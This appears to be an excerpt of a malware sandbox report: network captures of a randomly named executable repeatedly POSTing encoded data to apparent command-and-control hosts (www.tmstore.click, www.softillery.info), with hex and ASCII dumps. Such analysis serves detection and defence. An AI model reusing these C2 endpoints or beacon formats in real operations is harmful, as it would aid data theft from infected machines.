                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:12 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            21192.168.2.84992154.179.173.60806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:19.232404947 CET797OUTPOST /qmcg/ HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tmstore.click
                                                                                                                                                            Referer: http://www.tmstore.click/qmcg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 57 37 63 36 68 58 57 34 61 74 42 6a 35 4f 75 52 75 77 56 69 53 65 2f 52 37 74 6e 44 79 78 32 39 46 6f 65 72 4a 35 4e 57 37 73 59 69 38 4f 74 32 75 44 4b 51 55 63 33 5a 68 74 41 4b 53 56 4c 74 4b 34 53 2b 63 66 51 46 76 2b 36 58 46 6f 4d 6a 48 79 50 37 31 54 72 34 32 55 62 2b 4f 64 6d 79 45 48 66 69 6d 4c 69 6a 51 33 78 71 4e 56 61 68 74 37 58 69 6f 6f 54 32 67 51 4d 54 4f 6e 5a 74 4a 74 33 45 72 6a 61 73 46 38 45 58 32 54 64 68 76 54 4f 4f 58 45 78 44 6f 72 58 34 4e 70 41 79 70 4b 58 52 42 37 69 45 69 75 65 63 67 4c 58 4c 68 56 72 48 73 64 4f 76 35 2b 4d 3d
                                                                                                                                                            Data Ascii: mnYxMt=35ggt26dJQJxW7c6hXW4atBj5OuRuwViSe/R7tnDyx29FoerJ5NW7sYi8Ot2uDKQUc3ZhtAKSVLtK4S+cfQFv+6XFoMjHyP71Tr42Ub+OdmyEHfimLijQ3xqNVaht7XiooT2gQMTOnZtJt3ErjasF8EX2TdhvTOOXExDorX4NpAypKXRB7iEiuecgLXLhVrHsdOv5+M=
                                                                                                                                                            Nov 12, 2024 18:35:20.212279081 CET364INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:20 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            22192.168.2.84993554.179.173.60806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:21.789608002 CET817OUTPOST /qmcg/ HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tmstore.click
                                                                                                                                                            Referer: http://www.tmstore.click/qmcg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 58 61 73 36 6a 30 2b 34 62 4e 42 69 79 75 75 52 6b 51 55 72 53 5a 33 52 37 6f 65 45 7a 43 65 39 45 49 75 72 49 39 68 57 34 73 59 69 75 75 74 35 6a 6a 4b 4c 55 63 36 36 68 74 4d 4b 53 56 76 74 4b 39 75 2b 63 6f 4d 61 76 75 36 52 4b 49 4d 62 59 69 50 37 31 54 72 34 32 55 50 59 4f 5a 4b 79 45 32 76 69 6d 76 4f 69 5a 58 78 31 64 31 61 68 6e 62 58 6d 6f 6f 54 66 67 52 42 30 4f 6c 68 74 4a 73 48 45 73 32 36 76 4b 38 45 64 36 44 63 73 75 79 75 65 53 56 30 68 70 37 4c 4a 4f 4c 56 4f 6c 63 36 37 62 5a 71 43 68 75 32 33 67 49 2f 39 6b 69 32 76 32 2b 65 66 6e 70 62 54 53 35 57 54 4f 78 55 67 78 70 78 67 5a 46 74 61 53 44 61 6a
                                                                                                                                                            Data Ascii: mnYxMt=35ggt26dJQJxXas6j0+4bNBiyuuRkQUrSZ3R7oeEzCe9EIurI9hW4sYiuut5jjKLUc66htMKSVvtK9u+coMavu6RKIMbYiP71Tr42UPYOZKyE2vimvOiZXx1d1ahnbXmooTfgRB0OlhtJsHEs26vK8Ed6DcsuyueSV0hp7LJOLVOlc67bZqChu23gI/9ki2v2+efnpbTS5WTOxUgxpxgZFtaSDaj
                                                                                                                                                            Nov 12, 2024 18:35:22.784611940 CET364INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:22 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            23192.168.2.84994854.179.173.60806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:24.335207939 CET1834OUTPOST /qmcg/ HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tmstore.click
                                                                                                                                                            Referer: http://www.tmstore.click/qmcg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 58 61 73 36 6a 30 2b 34 62 4e 42 69 79 75 75 52 6b 51 55 72 53 5a 33 52 37 6f 65 45 7a 45 47 39 46 37 6d 72 48 38 68 57 35 73 59 69 31 75 74 36 6a 6a 4c 52 55 64 53 6d 68 74 52 33 53 54 72 74 4c 62 36 2b 4e 36 6b 61 6b 75 36 52 53 49 4d 67 48 79 50 79 31 54 37 30 32 55 66 59 4f 5a 4b 79 45 30 6e 69 76 62 69 69 66 58 78 71 4e 56 61 74 74 37 58 4f 6f 73 2f 6c 67 52 45 44 62 46 42 74 4a 4d 58 45 70 43 61 76 56 4d 45 62 35 44 64 2f 75 79 6a 5a 53 56 35 51 70 34 58 76 4f 4a 31 4f 67 4e 48 5a 65 4c 2b 56 67 6f 69 33 6b 49 72 4d 6c 68 65 4c 39 4e 44 72 6c 65 72 76 63 35 57 51 48 51 30 75 7a 4f 38 50 4c 67 52 2f 43 48 48 59 67 4e 43 62 35 6d 73 32 47 49 47 4a 55 4b 35 52 4d 77 48 4b 74 45 32 67 72 38 50 79 42 2b 41 51 7a 42 38 36 5a 32 77 69 75 63 77 72 67 47 52 57 75 4a 48 61 47 45 65 6e 2b 32 70 41 30 69 47 6c 4d 34 36 4e 44 70 68 49 6c 48 6e 4f 75 65 31 51 41 45 68 4b 68 64 65 66 55 4a 34 4b 55 6e 47 63 50 6e 53 42 6d 32 6b 39 69 47 39 54 66 47 49 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=35ggt26dJQJxXas6j0+4bNBiyuuRkQUrSZ3R7oeEzEG9F7mrH8hW5sYi1ut6jjLRUdSmhtR3STrtLb6+N6kaku6RSIMgHyPy1T702UfYOZKyE0nivbiifXxqNVatt7XOos/lgREDbFBtJMXEpCavVMEb5Dd/uyjZSV5Qp4XvOJ1OgNHZeL+Vgoi3kIrMlheL9NDrlervc5WQHQ0uzO8PLgR/CHHYgNCb5ms2GIGJUK5RMwHKtE2gr8PyB+AQzB86Z2wiucwrgGRWuJHaGEen+2pA0iGlM46NDphIlHnOue1QAEhKhdefUJ4KUnGcPnSBm2k9iG9TfGIWrMSWHSpnU8kBjhcaAEJj+2VSgdx5hxtmL9cn7VbAbQykXVjwLJ2UsNcli9ZT3lpiUtEKU5vJ5RR5YV+MC6dcmWCc83aIaHzZiMYQ/ykqELbFdDeu6FpthMZOn3uX19PQvJfUHgK5/scmIzfEv7X/7CIDfc0bGiY8zhGl34H10U0qb4GLid+iqGfBIvIAO5e0HRBYs4NF8urbl1HcTDbTJLvsfqbWvtZD256T5d+Gw4IlPmhw07vjaLKE8SoX0Zu3GJ9v2MXF6Y6Qgx//q9p78te3fRSnPftVnhJvPDtkvI0iSXXE7HKfXmhfG4+7t67e9Vf4vYqyEemOtftqs3F6jUaG2rLlFbArlxqUlEhqGwny7jnSQeFglbVmZnvcUyquFtiupghRS9Mxjtd/bOZ8KCI9+/pqLiEVr1xRgdVpdxglyi77CyhhRQqYn/DzkcGywos8ZPph3bji9iS9zvts/zVshOKUapD2WREI1rXMWairCvvb7QgVKCCiiK36K4lUJf9Tuq3bkItdzG1fKPQeKlCJS1P+m8sPEdEAaJGSjcdIBIohJ9lyHjuEUOWTAtHJbAySPZG61LZ6xBhRQgUkuMWPjZJzG2R9Mv41DsyrCBW+0gWlma2Yn5jANQ3y9lgX3DqarXJQOsYUoD/7HYcZI77Fo3icfIQUi [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:35:25.321352959 CET364INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:25 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            24192.168.2.84996154.179.173.60806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:26.877439976 CET538OUTGET /qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:35:27.912062883 CET520INHTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:27 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZA
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            25192.168.2.8499893.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:33.197989941 CET803OUTPOST /xia9/ HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.softillery.info
                                                                                                                                                            Referer: http://www.softillery.info/xia9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 33 48 7a 4a 31 6f 50 30 78 4f 4d 4a 52 49 63 72 55 30 45 2b 6b 76 59 61 4b 75 67 67 4c 63 54 34 7a 52 50 53 2b 71 6e 47 53 70 57 68 65 54 46 4d 69 38 4b 4f 6b 48 6f 2f 57 52 61 43 4e 6b 70 59 56 56 64 65 79 42 6a 68 78 58 41 33 73 68 54 73 55 6a 4b 6c 57 42 79 38 4a 6b 6e 72 78 5a 30 53 4f 62 58 58 73 33 7a 56 30 66 2b 63 65 6f 6c 30 4f 68 62 7a 72 72 2f 2b 36 2f 71 74 35 4a 65 75 68 6a 4f 73 6e 6a 34 76 71 37 57 69 32 4d 70 63 4c 36 46 45 66 49 2b 6a 4d 56 73 46 75 75 34 47 39 35 71 4b 42 54 4d 7a 36 49 4c 53 47 6d 51 4c 52 50 45 4b 4c 4e 6a 38 54 46 56 6d 37 46 36 2f 63 62 2b 48 54 45 73 3d
                                                                                                                                                            Data Ascii: mnYxMt=3HzJ1oP0xOMJRIcrU0E+kvYaKuggLcT4zRPS+qnGSpWheTFMi8KOkHo/WRaCNkpYVVdeyBjhxXA3shTsUjKlWBy8JknrxZ0SObXXs3zV0f+ceol0Ohbzrr/+6/qt5JeuhjOsnj4vq7Wi2MpcL6FEfI+jMVsFuu4G95qKBTMz6ILSGmQLRPEKLNj8TFVm7F6/cb+HTEs=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            26192.168.2.8499993.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:35.737545013 CET823OUTPOST /xia9/ HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.softillery.info
                                                                                                                                                            Referer: http://www.softillery.info/xia9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 33 48 7a 4a 31 6f 50 30 78 4f 4d 4a 53 72 45 72 53 56 45 2b 68 50 59 62 42 4f 67 67 41 38 54 38 7a 51 7a 53 2b 6f 4b 42 53 2f 4f 68 66 79 31 4d 6a 35 2b 4f 33 33 6f 2f 59 78 61 48 4a 6b 70 48 56 56 68 67 79 45 44 68 78 57 67 33 73 6c 58 73 55 51 69 71 58 52 79 2b 43 45 6e 74 2b 35 30 53 4f 62 58 58 73 7a 66 37 30 66 6d 63 64 59 56 30 50 45 75 6c 6d 4c 2f 78 71 66 71 74 75 5a 65 71 68 6a 4f 65 6e 69 6c 6e 71 2b 53 69 32 4f 78 63 50 2f 70 46 57 49 2b 68 43 31 74 74 2f 50 45 49 6b 4a 61 39 41 51 73 73 30 4c 44 33 4b 77 39 68 4c 74 4d 4d 49 4e 4c 58 54 47 39 51 2b 79 6e 58 47 34 75 33 4e 54 36 31 50 35 75 44 4a 6c 76 71 76 4a 32 7a 67 64 62 62 48 47 55 33
                                                                                                                                                            Data Ascii: mnYxMt=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/Ohfy1Mj5+O33o/YxaHJkpHVVhgyEDhxWg3slXsUQiqXRy+CEnt+50SObXXszf70fmcdYV0PEulmL/xqfqtuZeqhjOenilnq+Si2OxcP/pFWI+hC1tt/PEIkJa9AQss0LD3Kw9hLtMMINLXTG9Q+ynXG4u3NT61P5uDJlvqvJ2zgdbbHGU3


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            27192.168.2.8500063.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:35:38.287031889 CET1840OUTPOST /xia9/ HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.softillery.info
                                                                                                                                                            Referer: http://www.softillery.info/xia9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 33 48 7a 4a 31 6f 50 30 78 4f 4d 4a 53 72 45 72 53 56 45 2b 68 50 59 62 42 4f 67 67 41 38 54 38 7a 51 7a 53 2b 6f 4b 42 53 2f 47 68 66 45 68 4d 6a 61 57 4f 30 33 6f 2f 48 42 61 47 4a 6b 70 4f 56 56 35 6b 79 45 48 75 78 53 51 33 2b 51 44 73 53 68 69 71 5a 52 79 2b 4e 6b 6e 6f 78 5a 30 39 4f 62 48 54 73 7a 76 37 30 66 6d 63 64 61 4e 30 47 78 61 6c 31 62 2f 2b 36 2f 71 68 35 4a 65 57 68 6a 32 30 6e 6a 52 33 71 4b 6d 69 32 75 68 63 4e 70 64 46 5a 49 2b 2f 46 31 74 31 2f 50 4a 4b 6b 4a 47 78 41 52 49 4b 30 4c 4c 33 50 31 51 75 66 2f 63 32 66 37 66 48 4b 6d 39 38 34 7a 50 64 49 36 2b 77 50 7a 79 52 59 75 2b 66 46 48 76 43 6a 36 54 62 36 59 71 4f 4c 32 39 38 67 72 59 65 77 4c 5a 6c 2b 73 50 69 55 36 49 41 77 58 62 2f 53 34 54 4c 39 6b 58 65 66 5a 31 49 70 77 79 63 32 4d 30 54 77 2f 31 7a 51 73 6f 66 66 56 68 78 7a 44 51 75 47 70 54 6e 54 72 39 73 56 6d 4a 54 48 43 44 64 77 56 56 75 37 63 36 41 33 72 41 6b 37 53 31 78 65 6e 71 33 63 70 4c 54 51 64 45 6d 7a 76 79 6a 4a 73 66 46 34 4d 53 [TRUNCATED]
